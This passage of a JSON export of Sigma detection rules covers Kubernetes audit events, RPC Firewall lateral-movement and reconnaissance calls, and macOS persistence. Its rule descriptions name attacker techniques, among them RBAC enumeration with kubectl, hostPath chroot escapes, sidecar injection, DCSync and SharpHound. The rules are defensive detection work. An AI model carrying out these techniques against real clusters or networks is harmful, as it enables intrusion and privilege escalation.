"https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_cronjob_modification.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.execution" ] }, "uuid": "0c9b3bda-41a6-4442-9345-356ae86343dc", "value": "Kubernetes CronJob/Job Modification" }, { "description": "Detects identities attempting to enumerate their Kubernetes RBAC permissions.\nIn the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment.\nIn a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a \"kubectl auth can-i --list\" command.\nThis will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_rbac_permisions_listing.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing.yml" ], "tags": [ "attack.t1069.003", "attack.t1087.004" ] }, "related": [ { "dest-uuid": "16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8f104855-e5b7-4077-b1f5-bc3103b41abe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84b777bd-c946-4d17-aa2e-c39f5a454325", "value": "RBAC Permission Enumeration Attempt" }, { "description": "Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.\nSystem pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names.\nAttackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.\nDeployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace" ], "filename": "kubernetes_audit_pod_in_system_namespace.yml", "level": "medium", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_pod_in_system_namespace.yml" ], "tags": [ "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a80d927d-ac6e-443f-a867-e8d6e3897318", "value": "Creation Of Pod In System Namespace" }, { "description": "Detects creation of a container with a hostPath mount.\nA hostPath volume mounts a directory or a file from the node to the container.\nAttackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "The DaemonSet controller creates pods with hostPath volumes within the kube-system namespace." ], "filename": "kubernetes_audit_hostpath_mount.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/", "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_hostpath_mount.yml" ], "tags": [ "attack.t1611" ] }, "related": [ { "dest-uuid": "4a5b7ade-8bb5-4853-84ed-23f262002665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "402b955c-8fe0-4a8c-b635-622b4ac5f902", "value": "Container With A hostPath Mount Created" }, { "description": "Detects when events are deleted in Kubernetes.\nAn adversary may delete Kubernetes events in an attempt to evade detection.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_events_deleted.yml", "level": "medium", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_events_deleted.yml" ], "tags": [ "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3132570d-cab2-4561-9ea6-1743644b2290", "value": "Kubernetes Events Deleted" }, { "description": "Detects the creation of a \"privileged\" container, an action which could be indicative of a threat actor mounting a container breakout attacks.\nA privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host.\nVarious versions of \"privileged\" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_privileged_pod_creation.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html", "https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer", "https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html", "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_privileged_pod_creation.yml" ], "tags": [ "attack.t1611" ] }, "related": [ { "dest-uuid": "4a5b7ade-8bb5-4853-84ed-23f262002665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5cd1b20-36bb-488d-8c05-486be3d0cb97", "value": "Privileged Container Deployed" }, { "description": "Detects the removal of a deployment from a Kubernetes cluster.\nThis could indicate disruptive activity aiming to impact business operations.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_deployment_deleted.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_deployment_deleted.yml" ], "tags": [ "attack.t1498" ] }, "related": [ { "dest-uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40967487-139b-4811-81d9-c9767a92aa5a", "value": "Deployment Deleted From Kubernetes Cluster" }, { "description": "Detects attempts to inject a sidecar container into a running deployment.\nA sidecar container is an additional container within a pod, that resides alongside the main container.\nOne way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a \"kubectl patch\" operation.\nBy injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_sidecar_injection.yml", "level": "medium", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/", "https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_sidecar_injection.yml" ], "tags": [ "attack.t1609" ] }, "related": [ { "dest-uuid": "7b50a1d3-4ca7-45d1-989d-a6503f04bfe1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad9012a6-e518-4432-9890-f3b82b8fc71f", "value": "Potential Sidecar Injection Into Running Deployment" }, { "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Remote administrative tasks on Windows Events" ], "filename": "rpc_firewall_eventlog_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", "value": "Remote Event Log Recon" }, { "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_sasec_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", "value": "Recon Activity via SASec" }, { "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Legitimate usage of remote file encryption" ], "filename": "rpc_firewall_efs_abuse.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", "value": "Remote Encrypting File System Abuse" }, { "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Some administrative tasks on remote host" ], "filename": "rpc_firewall_remote_dcom_or_wmi.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.003", "attack.t1047" ] }, "related": [ { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", "value": "Remote DCOM/WMI Lateral Movement" }, { "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_atsvc_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1053", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", "value": "Remote Schedule Task Lateral Movement via ATSvc" }, { "description": "Detects remote RPC calls to create or execute a scheduled task", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1053", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" }, { "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_sharphound_recon_account.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ "attack.t1087", "attack.discovery" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", "value": "SharpHound Recon Account Discovery" }, { "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Actual printing" ], "filename": "rpc_firewall_printing_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", "value": "Remote Printing Abuse for Lateral Movement" }, { "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_sasec_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1053", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", "value": "Remote Schedule Task Lateral Movement via SASec" }, { "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Administrative tasks on remote services" ], "filename": "rpc_firewall_remote_service_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", "value": "Remote Server Service Abuse for Lateral Movement" }, { "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_dcsync_attack.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ "attack.t1033", "attack.discovery" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", "value": "Possible DCSync Attack" }, { "description": "Detects remote RPC calls to read information about scheduled tasks", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_itaskschedulerservice_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", "value": "Remote Schedule Task Recon via ITaskSchedulerService" }, { "description": "Detects remote RPC calls to modify the registry and possible execute code", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Remote administration of registry values" ], "filename": "rpc_firewall_remote_registry_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", "value": "Remote Registry Lateral Movement" }, { "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_atsvc_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", "value": "Remote Schedule Task Recon via AtScv" }, { "description": "Detects remote RPC calls to collect information", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Remote administration of registry values" ], "filename": "rpc_firewall_remote_registry_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", "value": "Remote Registry Recon" }, { "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Legitimate remote share creation" ], "filename": "rpc_firewall_remote_server_service_abuse.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", "value": "Remote Server Service Abuse" }, { "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_sharphound_recon_sessions.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], "tags": [ "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", "value": "SharpHound Recon Sessions" }, { "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-23", "falsepositive": [ "Legitimate administration activities" ], "filename": "file_event_macos_emond_launch_daemon.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "macos", "refs": [ "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.014" ] }, "related": [ { "dest-uuid": "9c45eaa3-8604-4780-8988-b5074dbb9ecd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", "value": "MacOS Emond Launch Daemon" }, { "description": "Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.\nAdversaries may use startup items automatically executed at boot initialization to establish persistence.\nStartup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.\n", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-14", "falsepositive": [ "Legitimate administration activities" ], "filename": "file_event_macos_susp_startup_item_created.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "macos", "refs": [ "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_susp_startup_item_created.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1037.005" ] }, "related": [ { "dest-uuid": "c0dfe7b0-b873-4618-9ff8-53e31f70907f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", "value": "Startup Item File Created - MacOS" }, { "description": "Detects macOS Gatekeeper bypass via xattr utility", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ 